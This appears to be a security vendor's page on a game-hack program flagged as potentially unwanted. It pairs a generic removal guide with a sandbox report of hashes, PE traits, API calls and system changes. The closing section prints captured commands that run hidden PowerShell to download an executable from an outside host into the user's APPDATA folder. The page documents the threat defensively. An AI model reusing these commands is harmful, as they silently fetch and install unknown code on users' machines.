PUP.Gamehack.GADC

Your system has been detected with PUP.Gamehack.GADC, a potentially unwanted program that may pose a risk to your computer's security and performance. It is essential to understand the nature of this threat and take immediate action to remove it to prevent any potential harm.

What Is PUP.Gamehack.GADC?

PUP.Gamehack.GADC is a type of potentially unwanted program (PUP) that may have been installed on your system without your knowledge or consent. PUPs are software applications that may not be malicious in nature but can still cause problems, such as slowing down your system, displaying unwanted ads, or collecting your personal data. The "Gamehack" part of the name suggests that it may be related to gaming, but it's crucial to note that this does not necessarily mean it's a malicious program designed to harm your system.

How PUP.Gamehack.GADC Operates

PUPs like PUP.Gamehack.GADC often operate by exploiting vulnerabilities in your system or by being bundled with other software applications. They may also be installed through deceptive means, such as fake updates or free downloads. Once installed, PUPs can run in the background, consuming system resources, and potentially causing problems with your computer's performance. They may also collect your personal data, such as browsing history or search queries, and use it for advertising or other purposes.

Symptoms of Infection

If your system is infected with PUP.Gamehack.GADC, you may experience a range of symptoms, including slow system performance, unwanted ads or pop-ups, and suspicious programs running in the background. You may also notice that your browser settings have been changed, or that you are being redirected to unwanted websites. In some cases, PUPs can also cause system crashes or freezes, making it difficult to use your computer.

  • Unwanted ads or pop-ups
  • Suspicious programs running in the background
  • Slow system performance
  • Changed browser settings
  • System crashes or freezes

How to Remove PUP.Gamehack.GADC

  1. Boot your system in Safe Mode with Networking to prevent any malicious programs from running
  2. Use a reputable anti-malware tool, such as SpyHunter, to perform a full scan of your system and remove any detected threats
  3. Uninstall any suspicious programs or applications that you do not recognize or need
  4. Reset your browser settings to their default values, including Chrome, Firefox, and Edge
  5. Reboot your system and perform another scan to ensure that the threat has been fully removed

Conclusion

Removing PUP.Gamehack.GADC from your system is crucial to preventing any potential harm and ensuring your computer's security and performance. By following the steps outlined above, you can effectively remove this potentially unwanted program and protect your system from similar threats in the future. It's essential to remain vigilant and take proactive measures to protect your system, such as keeping your operating system and software up to date, using reputable anti-malware tools, and being cautious when downloading or installing new applications.

Analysis Report

General information

Family Name: PUP.Gamehack.GADC
Signature status: No Signature

Known Samples

MD5: d7d18fe75ba6de54b1b408778e1da4c6
SHA1: d94aac9f0a17f027ba4ffc485b227edb75d06f5c
SHA256: 86358B9236EB5D79E853629328D68E69E4D1CAEF522FFEE32402ADBB188955FC
File Size: 945.66 KB, 945664 bytes
MD5: 5ddcce1b31fd1ef0de4584c5e8eb020d
SHA1: ac1250c55cca92e86bacd702b42b46e6c88c3417
SHA256: 52693D70E704C3EA8C88734F24E879F626F7E8B8ED207068F80746A59B37C42B
File Size: 928.77 KB, 928768 bytes
MD5: fd400b8e509d9d4cba5a6754814fef53
SHA1: b48bd9f6014433ddef6f980fa43e14f649818a23
SHA256: 57CD6039804CE0ED4AA5FE32A2198259182BFE1C5B4FFCCDF1F91F397E82AF3D
File Size: 275.97 KB, 275968 bytes
MD5: ac29659f4343323d12fa14619bd3e050
SHA1: b94365b1c9da5e69970e9dbcf8ceecf3ba6f3645
SHA256: 7138487DC3BB4282B7FB008E170FE46BEB3290FAE4DD5E07762D7B1C5D49CFB9
File Size: 1.09 MB, 1089536 bytes
MD5: b5d4317454fe268775d73e6922587e10
SHA1: 4c40f47709c682ad7c3d6758ba13f513efc46939
SHA256: 748C2E82046DCC2D794E76AE54C138551F68D64C6B5D14B558EB40E0A6165506
File Size: 283.65 KB, 283648 bytes
Show More
MD5: 8e7d18c33c4c144656f09857fb7d0de5
SHA1: c666c7e3398a5b1d3ebb7e362dde0b45817d90b0
SHA256: B957C417B8D0087D2C40F82F7F2E92E952CE7523FAD4079F0573C0CF57BA2973
File Size: 360.45 KB, 360448 bytes
MD5: c1d4688725edd6f6438309606e95634a
SHA1: d82c402311831faf47839a1ba04cf19cc0d33ba8
SHA256: DD5AC91488C636D475EF753C3726E900039DB27D0CC5F5C11F1844A3B37693DC
File Size: 1.65 MB, 1648640 bytes
MD5: 0aaa5c5caeab27cb10da9c76fa3a4e1c
SHA1: 29e41d38b12368d758fef764954b2a4fdd43413d
SHA256: 4266035E908A59EE346017317340A293D14794267D7AEC2410654FA35E6826B4
File Size: 1.66 MB, 1655296 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have resources
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is Native application (NOT .NET application)
Show More
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Traits

  • 2+ executable sections
  • dll
  • GetConsoleWindow
  • imgui
  • No Version Info
  • VirtualQueryEx
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 3,302
Potentially Malicious Blocks: 257
Whitelisted Blocks: 2,632
Unknown Blocks: 413

Visual Map

0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 ? ? x ? ? 0 0 ? 0 0 0 0 0 x 0 0 ? 0 0 ? 0 0 0 0 x ? ? ? 0 x 0 ? x x ? ? x x 0 x ? 0 x x ? ? x 0 x 0 x 0 0 0 x x x x x 0 x 0 0 0 0 0 x x 0 ? x 0 x x x x x 0 x ? 0 x 0 ? x 0 x 0 0 x x ? x x 0 ? 0 0 0 0 ? 0 0 0 0 0 0 x ? x x x 0 0 x 0 x x 0 0 0 x 0 0 0 0 0 x x 0 0 x x 0 0 0 x 0 x 0 0 x 0 0 ? 0 x x 0 0 0 x x 0 x x 0 0 0 x 0 x x 0 x 0 x ? x ? 0 0 0 0 0 0 0 x x ? 0 x x 0 x x ? x x ? ? ? x x ? x 0 0 x ? 0 x x 0 0 0 x 0 x x 0 0 x x x 0 x 0 0 0 ? x 0 0 0 0 x 0 x 0 0 0 x 0 0 0 x 0 0 x x 0 0 0 ? x 0 x 0 0 x 0 0 0 0 x 0 ? x x 0 x x 0 0 x ? x 0 x ? x x 0 0 0 x 0 0 0 ? ? ? x 0 x x x x x x x x x x 0 ? x x 0 0 0 x x ? x x ? ? ? x ? ? x 0 x x x x x 0 x x 0 0 ? x x ? ? x x x x 0 x x x 0 0 0 x 0 0 x x x 0 x x x ? 0 ? 0 x 0 x 0 0 x x x 0 0 0 x x x 0 ? x x x x x x x 0 x x 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 ? 0 x x 0 0 0 ? 0 0 0 0 0 0 x 0 0 0 0 0 ? 0 0 x 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 x 0 0 x x 0 0 0 0 x x x 0 0 0 x x x 0 0 x 0 x 0 x x x x 0 ? 0 0 x x x x x 0 ? ? 0 ? ? ? 0 ? ? ? ? ? 0 ? 0 ? 0 ? 0 0 0 x ? 0 ? 0 ? 0 ? 0 ? 0 ? 0 ? x ? ? ? ? ? ? ? ? 0 0 x x ? x x x x 0 0 x ? x 0 0 x ? x ? 0 x x x x ? x ? 0 0 ? 0 0 0 ? ? ? ? 0 x x 0 x 0 0 ? x ? ? 0 0 0 ? 0 0 0 0 0 ? ? ? ? 0 x 0 0 0 x ? 0 ? 0 0 0 ? x ? x x 0 x ? ? ? ? 0 0 ? ? 0 x ? ? x 0 x 0 ? ? 0 x 0 0 ? x x x x 0 0 0 x 0 0 x 0 0 0 0 0 ? 0 0 0 x ? x 0 0 0 x x 0 0 0 0 0 0 x ? 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x x 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 ? 0 0 0 0 0 ? ? ? ? ? ? ? ? ? 0 ? 0 ? 0 ? 0 ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 ? 0 0 0 ? 0 0 x x 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 ? ? x 0 0 ? ? ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? 0 ? ? ? x x ? ? ? ? ? ? 0 ? ? ? ? ? ? 0 ? 0 0 x ? 0 ? 0 ? ? ? ? ? ? ? ? x ? x ? ? ? ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? x ? x ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? 0 ? ? 0 ? ? ? ? ? ? 0 ? ? ? ? ? ? 0 ? 0 ? ? ? ? ? ? ? ? ? x ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 ? ? ? ? ? 0 ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x ? x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? 0 ? 0 ? 0 0
... Data truncated
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Files Modified

File Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134330051898476041.4308.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_4ktansd4.fzt.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_dds2oeuk.awd.ps1 Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ὰ䏊䔶ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 籷擔㟆ǝ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe რ熠㱸ǝ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 廭熮㱸ǝ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 솨熰㱸ǝ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
Show More
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSetTimerEx
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess

14 additional items are not displayed above.

Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Process Terminate
  • TerminateProcess
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Shell Execute
  • CreateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://i-like.boats/Stb/Retev.php?bl=oPsCYIpOtWuiUYS5i8PRE016.txt' -OutFile $env:APPDATA\BK127533.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://i-like.boats/Stb/Retev.php?bl=oPsCYIpOtWuiUYS5i8PRE016.txt' -OutFile $env:APPDATA\BK127533.exe